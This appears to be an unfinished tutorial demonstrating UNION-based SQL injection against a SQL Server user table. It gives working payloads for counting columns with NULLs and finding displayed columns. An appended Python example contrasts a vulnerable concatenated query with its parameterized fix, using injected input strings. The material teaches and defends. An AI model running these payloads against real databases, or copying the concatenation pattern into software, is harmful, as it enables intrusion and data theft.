SQL Server Injection: Principle Demonstration
The steps of the injection scenario are reproduced directly against the database.
Injection
Msg 206, Level 16, State 2, Line 9
Operand type clash: ntext is incompatible with int
SELECT * FROM eims_User WHERE UserID = '4' AND 1 = 2
UNION ALL SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19
Msg 206, Level 16, State 2, Line 9
Operand type clash: ntext is incompatible with int
The way around this is to use UNION ALL instead of UNION and to use NULL instead of a number for each column placeholder, since NULL is compatible with every column type. Once the column count matches, the NULLs are replaced with numbers one at a time.
With 20 NULLs an error is raised:
SELECT * FROM eims_User WHERE UserID='4' AND 1=1 UNION ALL SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
SELECT * FROM eims_User WHERE UserID='4' AND 1=1 UNION ALL SELECT null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null
(With AND 1 = 1 two rows are returned at this point: the real row for UserID 4 plus the all-NULL row from the UNION.)
With 19 NULLs the query runs without error, so the table can be determined to have 19 columns.
Now replace AND 1 = 1 with AND 1 = 2, and replace the NULLs with int-type values one by one. Whenever an error is reported, put the NULL back in the position that caused it and leave the others unchanged.
In this way the display positions (the columns whose values appear in the page output) are obtained.
SELECT * FROM eims_User WHERE UserID = '4' AND 1 = 2
UNION ALL SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, null, 17, 18, 19
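As an added example (not from the original page), the application-side pattern that makes the queries above possible, string concatenation of UserID into the statement, beside its parameterized fix. SQLite stands in for SQL Server and a constructed three-column eims_User table stands in for the real 19-column one; the assumption is only that both engines reject a UNION whose column count does not match (SQLite does not reproduce the ntext/int type clash).

```python
import sqlite3

# Constructed stand-in for the page's eims_User table, cut to 3 columns.
SCHEMA = """
CREATE TABLE eims_User (UserID INTEGER, UserName TEXT, Email TEXT);
INSERT INTO eims_User VALUES (4, 'alice', 'alice@example.invalid');
INSERT INTO eims_User VALUES (5, 'bob',   'bob@example.invalid');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, user_id):
    """The pattern behind the page's queries: input is glued into the SQL text,
    so a quote in it ends the literal and the remainder is parsed as SQL."""
    sql = f"SELECT * FROM eims_User WHERE UserID = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened form: the value travels separately from the statement, so it is
    always one literal and can never append a UNION or change the column count."""
    sql = "SELECT * FROM eims_User WHERE UserID = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def probe(lookup, user_id):
    """Run one lookup on a fresh database and summarise the feedback the page's
    NULL-counting step depends on: 'error' if the statement is rejected,
    otherwise the number of rows returned."""
    conn = open_db()
    try:
        return f"rows:{len(lookup(conn, user_id))}"
    except sqlite3.OperationalError:
        return "error"
    finally:
        conn.close()


# Constructed inputs mirroring the page's column-count step (wrong count, right count).
TWO_NULLS = "4' AND 1=2 UNION ALL SELECT null,null--"
THREE_NULLS = "4' AND 1=2 UNION ALL SELECT null,null,null--"

if __name__ == "__main__":
    print(probe(lookup_vulnerable, "4"))             # rows:1  legitimate lookup
    print(probe(lookup_vulnerable, TWO_NULLS))       # error   column count mismatch
    print(probe(lookup_vulnerable, THREE_NULLS))     # rows:1  the injected NULL row
    print(probe(lookup_parameterized, THREE_NULLS))  # rows:0  input stays a plain string
```

The third and fourth probes are the point: the same input that yields the UNION's NULL row through concatenation matches nothing once it is bound as a parameter.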
Other operations: to be continued...